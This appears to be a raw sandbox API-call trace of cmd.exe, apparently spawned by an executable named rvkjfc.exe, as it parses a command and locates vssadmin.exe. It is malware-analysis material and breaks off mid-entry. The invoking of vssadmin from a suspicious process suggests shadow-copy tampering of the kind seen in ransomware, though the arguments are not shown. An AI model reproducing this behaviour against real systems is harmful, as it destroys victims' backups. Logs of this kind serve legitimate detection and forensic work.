0x2eca20 [0044.992] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2eca30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0044.992] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0044.992] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.992] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.992] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0044.992] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0044.992] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0044.992] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0044.992] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0044.992] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0044.992] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0044.993] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0044.993] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0044.993] GetProcessHeap () returned 0x2d0000 [0044.993] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb4e0 | out: hHeap=0x2d0000) returned 1 [0044.993] GetEnvironmentStringsW () returned 0x2eaa50* [0044.993] GetProcessHeap () returned 0x2d0000 [0044.993] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa94) returned 0x2ecc40 [0044.993] FreeEnvironmentStringsW (penv=0x2eaa50) returned 1 [0044.993] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.993] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.993] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0044.993] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0044.993] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0044.993] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0044.993] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0044.993] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0044.993] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0044.993] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0044.993] GetProcessHeap () returned 0x2d0000 [0044.993] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x5c) returned 0x2e8300 [0044.993] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef510 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef510, lpFilePart=0x1ef4f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef4f0*="Desktop") returned 0x25 [0044.993] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0044.993] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef220 | out: lpFindFileData=0x1ef220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2e99a0 [0044.994] FindClose (in: hFindFile=0x2e99a0 | out: hFindFile=0x2e99a0) returned 1 [0044.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef220 | out: lpFindFileData=0x1ef220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2e99a0 [0044.994] FindClose (in: hFindFile=0x2e99a0 | out: hFindFile=0x2e99a0) returned 1 [0044.994] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0044.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef220 | out: lpFindFileData=0x1ef220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2e99a0 [0044.994] FindClose (in: hFindFile=0x2e99a0 | out: hFindFile=0x2e99a0) returned 1 [0044.994] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0044.994] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0044.994] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0044.994] GetProcessHeap () returned 0x2d0000 [0044.994] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc40 | out: hHeap=0x2d0000) returned 1 [0044.994] GetEnvironmentStringsW () returned 0x2ecc40* [0045.081] GetProcessHeap () returned 0x2d0000 [0045.081] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2ed730 [0045.081] FreeEnvironmentStringsW (penv=0x2ecc40) returned 1 [0045.081] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0045.081] GetProcessHeap () returned 0x2d0000 [0045.081] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8300 | out: hHeap=0x2d0000) returned 1 [0045.081] GetProcessHeap () returned 0x2d0000 [0045.081] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4016) returned 0x2ee220 [0045.081] GetProcessHeap () returned 0x2d0000 [0045.081] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x64) returned 0x2e8300 [0045.082] GetProcessHeap () returned 0x2d0000 [0045.082] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee220 | out: hHeap=0x2d0000) returned 1 [0045.082] GetConsoleOutputCP () returned 0x1b5 [0045.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0045.082] GetUserDefaultLCID () returned 0x409 [0045.082] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d57b50, cchData=8 | out: lpLCData=":") returned 2 [0045.082] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef620, cchData=128 | out: lpLCData="0") returned 2 [0045.082] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef620, cchData=128 | out: lpLCData="0") returned 2 [0045.082] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef620, cchData=128 | out: lpLCData="1") returned 2 [0045.082] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d6a740, cchData=8 | out: lpLCData="/") returned 2 [0045.082] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d57b40, cchData=8 | out: lpLCData=".") returned 2 [0045.083] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0045.083] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0045.084] GetProcessHeap () returned 0x2d0000 [0045.084] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2eb5b0 [0045.084] GetConsoleTitleW (in: lpConsoleTitle=0x2eb5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.084] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0045.084] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0045.084] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0045.084] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0045.084] GetProcessHeap () returned 0x2d0000 [0045.084] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2ee220 [0045.084] GetProcessHeap () returned 0x2d0000 [0045.084] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee220 | out: hHeap=0x2d0000) returned 1 [0045.085] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0045.085] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0045.085] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0045.085] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0045.085] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0045.085] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0045.085] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0045.085] GetProcessHeap () returned 0x2d0000 [0045.085] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2eb7d0 [0045.085] GetProcessHeap () returned 0x2d0000 [0045.086] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2e6570 [0045.086] GetProcessHeap () returned 0x2d0000 [0045.086] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2e8570 [0045.087] GetConsoleTitleW (in: lpConsoleTitle=0x1ef530, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.087] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0045.087] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0045.087] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0045.087] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0045.087] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0045.087] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0045.087] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0045.087] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0045.087] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0045.087] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0045.087] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0045.087] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0045.088] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0045.088] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0045.088] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0045.088] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0045.088] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0045.088] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0045.088] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0045.088] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0045.088] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0045.088] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0045.088] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0045.088] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0045.088] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0045.088] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0045.088] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0045.088] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0045.088] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0045.088] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0045.088] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0045.088] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0045.088] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0045.088] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0045.088] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0045.088] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0045.088] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0045.088] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0045.088] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0045.088] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0045.088] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0045.088] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0045.088] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0045.088] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0045.088] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0045.089] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0045.089] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0045.089] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0045.089] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0045.089] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0045.089] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0045.089] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0045.089] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0045.089] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0045.089] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0045.089] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0045.089] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0045.089] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0045.089] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0045.089] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0045.089] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0045.089] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0045.089] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0045.089] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0045.089] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0045.089] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0045.089] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0045.089] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0045.089] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0045.089] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0045.089] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0045.089] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0045.089] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0045.089] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0045.089] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0045.089] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0045.089] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0045.089] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0045.089] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0045.089] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0045.089] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0045.089] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0045.089] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0045.089] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0045.090] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0045.090] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0045.090] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0045.090] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0045.090] GetProcessHeap () returned 0x2d0000 [0045.090] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eb890 [0045.090] GetProcessHeap () returned 0x2d0000 [0045.090] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x62) returned 0x2ebab0 [0045.090] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0045.091] GetProcessHeap () returned 0x2d0000 [0045.091] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2ebb20 [0045.091] SetErrorMode (uMode=0x0) returned 0x0 [0045.091] SetErrorMode (uMode=0x1) returned 0x0 [0045.091] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2ebb30, lpFilePart=0x1eedc0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eedc0*="Desktop") returned 0x25 [0045.091] SetErrorMode (uMode=0x0) returned 0x1 [0045.091] GetProcessHeap () returned 0x2d0000 [0045.091] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2ebb20, Size=0x76) returned 0x2ebb20 [0045.091] GetProcessHeap () returned 0x2d0000 [0045.091] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb20) returned 0x76 [0045.091] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0045.091] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.091] GetProcessHeap () returned 0x2d0000 [0045.091] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x128) returned 0x2ebbb0 [0045.091] GetProcessHeap () returned 0x2d0000 [0045.091] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x240) returned 0x2ebce0 [0045.096] GetProcessHeap () returned 0x2d0000 [0045.096] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2ebce0, Size=0x12a) returned 0x2ebce0 [0045.096] GetProcessHeap () returned 0x2d0000 [0045.096] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebce0) returned 0x12a [0045.096] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.096] GetProcessHeap () returned 0x2d0000 [0045.096] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2ebe20 [0045.097] GetProcessHeap () returned 0x2d0000 [0045.097] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2ebe20, Size=0x7e) returned 0x2ebe20 [0045.097] GetProcessHeap () returned 0x2d0000 [0045.097] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebe20) returned 0x7e [0045.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.097] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eeb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb30) returned 0xffffffffffffffff [0045.097] GetLastError () returned 0x2 [0045.098] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1eeb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb30) returned 0xffffffffffffffff [0045.098] GetLastError () returned 0x2 [0045.098] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eeb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb30) returned 0xffffffffffffffff [0045.098] GetLastError () returned 0x2 [0045.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.098] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eeb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb30) returned 0x2e99a0 [0045.098] GetProcessHeap () returned 0x2d0000 [0045.098] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e45f0 [0045.098] FindClose (in: hFindFile=0x2e99a0 | out: hFindFile=0x2e99a0) returned 1 [0045.098] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0045.098] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0045.098] GetConsoleTitleW (in: lpConsoleTitle=0x1ef080, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.098] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eee38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eedf8 | out: lpAttributeList=0x1eee38, lpSize=0x1eedf8) returned 1 [0045.098] UpdateProcThreadAttribute (in: lpAttributeList=0x1eee38, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eede8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eee38, lpPreviousValue=0x0) returned 1 [0045.098] GetStartupInfoW (in: lpStartupInfo=0x1eef50 | out: lpStartupInfo=0x1eef50*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0045.098] GetProcessHeap () returned 0x2d0000 [0045.098] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e4620 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned 